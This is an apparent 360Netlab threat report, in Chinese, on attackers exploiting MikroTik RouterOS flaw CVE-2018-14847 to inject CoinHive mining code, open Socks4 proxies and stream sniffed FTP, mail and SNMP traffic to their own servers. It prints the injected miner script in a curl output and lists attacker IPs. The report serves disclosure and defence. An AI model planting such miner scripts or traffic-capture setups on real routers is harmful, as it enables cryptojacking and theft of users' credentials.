竊聽風雲: 你的MikroTik路由器正在被監聽

來自專欄 360Netlab

背景介紹

MikroTik是一家拉脫維亞公司，成立於1996年，致力於開發路由器和無線ISP系統。MikroTik現在為世界上大多數國家/地區的互聯網連接提供硬體和軟體。在1997年，MikroTik創建了RouterOS軟體系統，在2002年，MikroTik決定製造自己的硬體並創建了RouterBOARD品牌，每個RouterBOARD設備都運行RouterOS軟體系統。[1]

根據維基解密披露的CIA Vault7黑客工具Chimay Red涉及到2個漏洞利用，其中包括Winbox任意目錄文件讀取（CVE-2018-14847）和Webfig遠程代碼執行漏洞。[2]

Winbox是一個Windows GUI應用程序，Webfig是一個Web應用程序，兩者都是RouterOS一個組件並被設計為路由器管理系統。Winbox和Webfig與RouterOS的網路通信分別在TCP/8291埠上，TCP/80或TCP/8080等埠上。[3] [4]

通過360Netlab Anglerfish蜜罐系統，我們觀察到惡意軟體正在利用MikroTik CVE-2018-14847漏洞植入CoinHive挖礦代碼，啟用Socks4代理，監聽路由器網路流量等。同時我們也看到業界已有部分關於CoinHive挖礦和Socks4代理披露，其中包括《BOTNET KAMPANJA NAPADA MIKROTIK USMJERIVA?E》[5] 和《Mass MikroTik Router Infection – First we cryptojack Brazil, then we take the World?》[6]

從2018-08-09至今，我們對CVE-2018-14847在全網的分布和利用做了多輪精確度量。每次發起度量時，我們嚴格遵循Winbox協議發起通信，因此可以精確確認通信對端就是MikroTik 路由器，並且能夠準確判定這些路由器是否失陷、以及失陷後被利用做了什麼。考慮到MikroTik設備的IP地址會動態更新，本文根據2018-08-23～2018-08-24的掃描數據做分析，並披露一些攻擊數據。

脆弱性分布

通過對全網TCP/8291埠掃描分析，發現開放該埠的IP數為5,000k，有1,200k確認為Mikrotik設備。其中有 370k(30.83%) 存在CVE-2018-14847漏洞。

以下是Top 20 國家統計列表（設備數量、國家）。

42376 Brazil/BR 40742 Russia/RU 22441 Indonesia/ID 21837 India/IN 19331 Iran/IR 16543 Italy/IT 14357 Poland/PL 14007 United States/US 12898 Thailand/TH 12720 Ukraine/UA 11124 China/CN 10842 Spain/ES 8758 South Africa/ZA 8621 Czech/CZ 6869 Argentina/AR 6474 Colombia/CO 6134 Cambodia/KH 5512 Bangladesh/BD 4857 Ecuador/EC 4162 Hungary/HU

被植入CoinHive挖礦代碼

攻擊者在啟用MikroTik RouterOS http代理功能後，使用了一些技巧，將所有的HTTPProxy請求重定向到一個本地的HTTP 403 error.html 頁面。在這個頁面中，攻擊者嵌入了一個來自 http://CoinHive.com 的挖礦代碼鏈接。通過這種方式，攻擊者希望利用所有經過失陷路由器上HTTP代理的流量來挖礦牟利。

然而實際上這些挖礦代碼不會有效工作。這是因為所有的外部Web資源，包括哪些挖礦所必須的來自http://CoinHive.com的代碼，都會被攻擊者自己設定訪問控制許可權所攔截。下面是一個示例。

# curl -i --proxy http://192.168.40.147:8080 http://netlab.360.comHTTP/1.0 403 Forbidden Content-Length: 418 Content-Type: text/html Date: Sat, 26 Aug 2017 03:53:43 GMT Expires: Sat, 26 Aug 2017 03:53:43 GMT Server: Mikrotik HttpProxy Proxy-Connection: close<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <title>"http://netlab.360.com/"</title><script src="https://coinhive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.Anonymous(hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3, {throttle: 0.2}); miner.start();</script> </head> <frameset> <frame src="http://netlab.360.com/"></frame> </frameset> </html>

被95.154.216.128/25啟用Socks4代理

目前，我們共檢測到 239K 個IP被惡意啟用Socks4代理，Socks4埠一般為TCP/4153，並設置Socks4代理只允許95.154.216.128/25訪問 (這裡的許可權控制是通過socks代理程序完成，防火牆不會屏蔽任意IP對TCP/4153埠的請求)。

因為MikroTik RouterOS設備會更新IP地址，攻擊者設置了定時任務訪問攻擊者指定的URL以此獲取最新的IP地址。此外，攻擊者還通過這些失陷的Socks4代理繼續掃描更多的MikroTik RouterOS設備。

網路流量被監聽

MikroTik RouterOS設備允許用戶在路由器上抓包，並把捕獲的網路流量轉發到指定Stream伺服器。[7]

目前共檢測到 7.5k MikroTik RouterOS設備IP已經被攻擊者非法監聽，並轉發TZSP流量到指定的IP地址，通信埠UDP/37008。

37.1.207.114 在控制範圍上顯著區別於其他所有攻擊者。該IP監聽了大部分MikroTik RouterOS設備，主要監聽TCP協議20，21，25，110，143埠，分別對應FTP-data，FTP，SMTP，POP3，IMAP協議流量。這些應用協議都是通過明文傳輸數據的，攻擊者可以完全掌握連接到該設備下的所有受害者的相關網路流量，包括FTP文件，FTP賬號密碼，電子郵件內容，電子郵件賬號密碼等。以下是packet-sniffer頁面示例。

185.69.155.23 是另外一個有意思的攻擊者，他主要監聽TCP協議110, 143, 21埠以及UDP協議161，162埠。161/162代表了SNMP（簡單網路管理協議，Simple Network Management Protocol），能夠支持網路管理系統，用以監測連接到網路上的設備）。[8] 因此，攻擊者通過監聽SNMP可以得到整個內部網路上的所有連接設備信息。

以下是Top攻擊者統計列表（曾經控制設備數量、攻擊者IP）。

5164 37.1.207.114 1347 185.69.155.23 1155 188.127.251.61 420 5.9.183.69 123 77.222.54.45 123 103.193.137.211 79 24.255.37.1 26 45.76.88.43 16 206.255.37.1

以下是所有攻擊者Top監聽埠統計列表。

5837 21 5832 143 5784 110 4165 20 2850 25 1328 23 1118 1500 1095 8083 993 3333 984 50001 982 8545 677 161 673 162 355 3306 282 80 243 8080 237 8081 230 8082 168 53 167 2048

通過對受害者IP分析，其中俄羅斯受影響最嚴重。以下是受害者Top分布統計列表。全部的受害者IP地址，不會向公眾公布。各受影響國家的相關安全和執法機構，可以向我們聯繫索取對應的IP地址列表。

1628 Russia/RU 637 Iran/IR 615 Brazil/BR 594 India/IN 544 Ukraine/UA 375 Bangladesh/BD 364 Indonesia/ID 218 Ecuador/EC 191 United States/US 189 Argentina/AR 122 Colombia/CO 113 Poland/PL 106 Kenya/KE 100 Iraq/IQ 92 Austria/AT 92 Asia-Pacific Region/ 85 Bulgaria/BG 84 Spain/ES 69 Italy/IT 63 South Africa/ZA 62 Czech/CZ 59 Serbia/RS 56 Germany/DE 52 Albania/AL 50 Nigeria/NG 47 China/CN 39 Netherlands/NL 38 Turkey/TR 37 Cambodia/KH 32 Pakistan/PK 30 United Kingdom/GB 29 European Union 26 Latin America 25 Chile/CL 24 Mexico/MX 22 Hungary/HU 20 Nicaragua/NI 19 Romania/RO 18 Thailand/TH 16 Paraguay/PY

處置建議

由CVE-2018-14847導致的安全風險遠不止於此，我們已經看到MikroTik RouterOS已經被諸多攻擊者惡意利用，我們也相信還會有更多的攻擊者和攻擊手段繼續參與進來。

我們建議MikroTik RouterOS用戶及時更新軟體系統，同時檢測http代理，Socks4代理和網路流量抓包功能是否被攻擊者惡意利用。

我們建議MikroTik廠商禁止向互聯網開放Webfig和Winbox埠，完善軟體安全更新機制。

相關安全和執法機構，可以郵件聯繫netlab[at]http://360.cn獲取被感染的IP地址列表。

聯繫我們

感興趣的讀者，可以在 twitter 或者在微信公眾號 360Netlab 上聯繫我們。

IoC

37.1.207.114 AS50673 Serverius Holding B.V. 185.69.155.23 AS200000 Hosting Ukraine LTD 188.127.251.61 AS56694 Telecommunication Systems, LLC 5.9.183.69 AS24940 Hetzner Online GmbH 77.222.54.45 AS44112 SpaceWeb Ltd 103.193.137.211 AS64073 Vetta Online Ltd 24.255.37.1 AS22773 Cox Communications Inc. 45.76.88.43 AS20473 Choopa, LLC 206.255.37.1 AS53508 Cablelynx 95.154.216.167 AS20860 iomart Cloud Services Limited.

推薦閱讀：